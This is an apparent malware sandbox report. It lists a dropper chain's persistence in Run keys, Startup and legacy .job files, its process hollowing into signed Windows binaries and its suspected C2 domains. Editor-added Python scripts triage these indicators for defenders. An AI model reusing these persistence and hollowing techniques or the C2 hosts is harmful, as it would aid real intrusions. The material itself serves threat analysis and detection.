| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3277ecaa2a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\3277ecaa2a.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
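Not every address in the behavioral1 Network table or in the two hosting tables above is a usable indicator: 8.8.8.8:53 is the sandbox's resolver, 172.67.189.66 sits in Cloudflare's anycast range and is shared with unrelated sites, and raw.githubusercontent.com, pastebin.com and ip-api.com are services that legitimate software also uses. The block below is an added example (editor's, not part of the sandbox report) that ranks those observations by how safely they can be blocked or hunted on. The rows are transcribed from the tables on this page; the resolver list, the CDN ranges and the confidence labels are the editor's assumptions.

```python
"""Rank the network observations of this report by blockability.

Added example (editor's, not part of the sandbox report). Rows are transcribed
from the behavioral1 Network table and the hosting / IP-lookup tables above.
"""
import ipaddress

# Transcribed from the report: (country, destination, domain, proto)
NETWORK_ROWS = [
    ("US", "8.8.8.8:53", "circujitstorm.bet", "udp"),
    ("US", "8.8.8.8:53", "explorebieology.run", "udp"),
    ("US", "8.8.8.8:53", "gadgethgfub.icu", "udp"),
    ("US", "8.8.8.8:53", "moderzysics.top", "udp"),
    ("US", "172.67.189.66:443", "moderzysics.top", "tcp"),
]
# Hosts named in the signature tables above
SIGNATURE_HOSTS = ["raw.githubusercontent.com", "pastebin.com", "ip-api.com"]

# Assumptions (editor's): public resolvers and Cloudflare anycast ranges.
PUBLIC_RESOLVERS = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "9.9.9.9"}
CDN_RANGES = [ipaddress.ip_network("172.64.0.0/13"), ipaddress.ip_network("104.16.0.0/13")]
# Services shared with legitimate software: only the full URL is an indicator.
SHARED_SERVICES = {"raw.githubusercontent.com", "pastebin.com", "ip-api.com"}


def classify_ip(ip: str) -> str:
    """'resolver' (never block), 'cdn' (shared front, low confidence) or 'direct'."""
    addr = ipaddress.ip_address(ip)
    if ip in PUBLIC_RESOLVERS:
        return "resolver"
    if any(addr in net for net in CDN_RANGES):
        return "cdn"
    return "direct"


def rank(rows, signature_hosts):
    """Return {indicator: confidence}; resolver IPs are dropped entirely."""
    out = {}
    for _country, dest, domain, _proto in rows:
        ip = dest.rpartition(":")[0]
        kind = classify_ip(ip)
        if kind == "cdn":
            out[ip] = "low"
        elif kind == "direct":
            out[ip] = "high"
        out[domain] = "context" if domain in SHARED_SERVICES else "high"
    for host in signature_hosts:
        out[host] = "context" if host in SHARED_SERVICES else "high"
    return out


def connected_domains(rows):
    """Domains that went past DNS to a TCP connection: the best pivot for hunting."""
    return sorted({domain for _, _, domain, proto in rows if proto == "tcp"})


if __name__ == "__main__":
    for indicator, confidence in sorted(rank(NETWORK_ROWS, SIGNATURE_HOSTS).items()):
        print(f"{confidence:8} {indicator}")
    print("connected:", connected_domains(NETWORK_ROWS))
```

Of the four looked-up domains only moderzysics.top produced a TCP connection within the 120 s window, so it is the strongest pivot; the other three may be fallbacks that never resolved in the sandbox. The "context" entries need the URL path from the full report before they mean anything in a proxy log.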
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3432 set thread context of 1940 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 1584 set thread context of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe |
| PID 4596 set thread context of 1036 | N/A | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4372 set thread context of 1456 | N/A | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
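The SetThreadContext rows above are the process-hollowing step: two droppers from %TEMP% start the signed BitLockerToGo.exe and replace its main thread's context, one sample hollows a copy of itself, and Explorer.EXE (itself a target of earlier injection) does the same to notepad.exe. By contrast, the WriteProcessMemory rows in behavioral1 are the sample crashing and WerFault.exe attaching to it (note the `-p 2208` in WerFault's command line, matching the source PID), not injection. The block below is an added example (editor's, not sandbox code) that separates the two cases; the five events are transcribed from those tables and the ranking rules are the editor's assumptions.

```python
"""Separate process injection from crash reporting in thread/memory events.

Added example (editor's, not part of the sandbox report). Events are
transcribed from the SetThreadContext table (behavioral2) and the
WriteProcessMemory table (behavioral1) on this page.
"""

# Paths a dropper can write to; an image here hijacking a Windows binary is hollowing.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"
BITLOCKERTOGO = r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C03B = r"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"

SAMPLE_EVENTS = [
    # behavioral1: the sample crashed and WerFault attached to PID 2208 to collect a dump
    dict(op="WriteProcessMemory", src_pid=2208, src=SAMPLE,
         dst_pid=2696, dst=r"C:\Windows\SysWOW64\WerFault.exe",
         dst_cmdline=r"C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1212"),
    dict(op="SetThreadContext", src_pid=3432, src=r"C:\Windows\Explorer.EXE",
         dst_pid=1940, dst=r"C:\Windows\System32\notepad.exe", dst_cmdline=""),
    dict(op="SetThreadContext", src_pid=1584, src=C03B, dst_pid=1588, dst=C03B, dst_cmdline=""),
    dict(op="SetThreadContext", src_pid=4596,
         src=r"C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe",
         dst_pid=1036, dst=BITLOCKERTOGO, dst_cmdline=""),
    dict(op="SetThreadContext", src_pid=4372,
         src=r"C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe",
         dst_pid=1456, dst=BITLOCKERTOGO, dst_cmdline=""),
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_crash_report(ev) -> bool:
    """WerFault.exe collecting a dump of the very process that 'wrote' to it."""
    if _basename(ev["dst"]) != "werfault.exe":
        return False
    toks = ev["dst_cmdline"].split()
    if "-p" not in toks:
        return False
    i = toks.index("-p")
    return i + 1 < len(toks) and toks[i + 1] == str(ev["src_pid"])


def classify(ev):
    """Return (severity, reason) for one cross-process event."""
    if ev["src_pid"] == ev["dst_pid"]:
        return "ignore", "same process"
    if is_crash_report(ev):
        return "benign", "crash reporting, not injection"
    src, dst = ev["src"].lower(), ev["dst"].lower()
    if ev["op"] == "SetThreadContext":
        if src == dst:
            return "medium", "unpacking stub hollowing a copy of itself"
        if src.startswith(USER_WRITABLE) and dst.startswith("c:\\windows\\"):
            return "high", "user-writable image hijacking a Windows binary (process hollowing)"
        return "medium", "cross-process thread context change"
    # WriteProcessMemory on its own is too common (debuggers, installers) to rank highly
    if src.startswith(USER_WRITABLE):
        return "low", "cross-process write from user-writable image"
    return "low", "cross-process write"


def triage(events):
    return [(classify(ev)[0], _basename(ev["src"]), _basename(ev["dst"])) for ev in events]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        sev, why = classify(ev)
        print(f"{sev:7} {_basename(ev['src'])} -> {_basename(ev['dst'])}: {why}")
```

The Explorer.EXE to notepad.exe row only rates "medium" here because both images live under C:\Windows; with parent and injection history available, Explorer changing another process's thread context is itself strong evidence that Explorer was compromised, and that row should be promoted.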
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
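Persistence in this run lands in three places: Run values pointing into %TEMP% and AppData\Roaming (the "Adds Run key" table), updater-themed files in the user's Startup folder ("Drops startup file"), and legacy .job files in C:\Windows\Tasks, which are written through the Task Scheduler 1.0 COM interface rather than schtasks.exe (schtasks and the UI store XML under System32\Tasks). The block below is an added example (editor's, not part of the sandbox report) that triages an autostart inventory against those patterns. The sample inventory is transcribed from the three tables above plus one benign OneDrive control entry; the scoring rules are the editor's assumptions, and on a live host the inventory would come from your own collection of the Run keys, the Startup folder and a directory listing of C:\Windows\Tasks.

```python
"""Triage autostart entries against the persistence patterns seen in this report.

Added example (editor's, not part of the sandbox report). Inventory rows are
transcribed from the Run-key, Startup-folder and C:\Windows\Tasks tables
above; the benign OneDrive row and the scoring rules are assumptions.
"""
import ntpath
import re

STARTUP = r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

# Constructed inventory: (kind, name, path)
SAMPLE_INVENTORY = [
    ("run", "am_no.cmd", r"C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd"),
    ("run", "83c5f6f0d5.exe", r"C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe"),
    ("run", "google_updates", r"C:\Users\Admin\AppData\Roaming\google_updates.exe"),
    ("run", "OneDrive", r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),  # benign control
    ("startup", "google_updates.lnk", STARTUP + r"\google_updates.lnk"),
    ("startup", "win_update.vbs", STARTUP + r"\win_update.vbs"),
    ("job", "rapes.job", r"C:\Windows\Tasks\rapes.job"),
    ("job", "Gxtuum.job", r"C:\Windows\Tasks\Gxtuum.job"),
    ("job", "Test Task17.job", r"C:\Windows\Tasks\Test Task17.job"),
]

SCRIPT_EXT = {".cmd", ".bat", ".vbs", ".js", ".ps1", ".hta"}
UPDATER_WORDS = re.compile(r"updat", re.IGNORECASE)


def _under_temp(path: str) -> bool:
    return "\\appdata\\local\\temp\\" in path.lower()


def _roaming_root(path: str) -> bool:
    """A bare file dropped directly into AppData\\Roaming (no vendor subfolder)."""
    return re.search(r"\\appdata\\roaming\\[^\\]+$", path, re.IGNORECASE) is not None


def _trusted_location(path: str) -> bool:
    return path.lower().startswith(("c:\\program files", "c:\\windows\\"))


def assess(kind, name, path):
    """Return (severity, reason), or None when the entry looks normal."""
    ext = ntpath.splitext(path)[1].lower()
    if kind == "run":
        if _under_temp(path):
            return "high", "autostart from %TEMP%"
        if ext in SCRIPT_EXT:
            return "high", "Run value launches a script"
        if UPDATER_WORDS.search(name) and not _trusted_location(path):
            return "medium", "updater-style name outside Program Files / Windows"
        if _roaming_root(path):
            return "medium", "executable dropped directly into AppData\\Roaming"
        return None
    if kind == "startup":
        if ext in SCRIPT_EXT:
            return "high", "script in Startup folder"
        return "medium", "shortcut in Startup folder; resolve its target"
    if kind == "job":
        # .job files come from the Task Scheduler 1.0 COM API; schtasks.exe
        # and the UI write XML under System32\Tasks instead.
        return "medium", "legacy .job file in C:\\Windows\\Tasks"
    return None


def hunt(inventory):
    """Return [(severity, kind, name, reason)] for every entry that needs a look."""
    findings = []
    for kind, name, path in inventory:
        verdict = assess(kind, name, path)
        if verdict:
            findings.append((verdict[0], kind, name, verdict[1]))
    return findings


if __name__ == "__main__":
    for sev, kind, name, why in hunt(SAMPLE_INVENTORY):
        print(f"{sev:6} {kind:8} {name}: {why}")
```

Two of the Run values here (am_no.cmd and the hex-named executables) follow the Amadey convention of a ten-digit folder under %TEMP%, and any Run value that resolves into that folder can be treated as high confidence; the google_updates entries are weaker on their own and rely on the name-versus-location mismatch.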
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dll32.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe
"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"
C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe
"C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
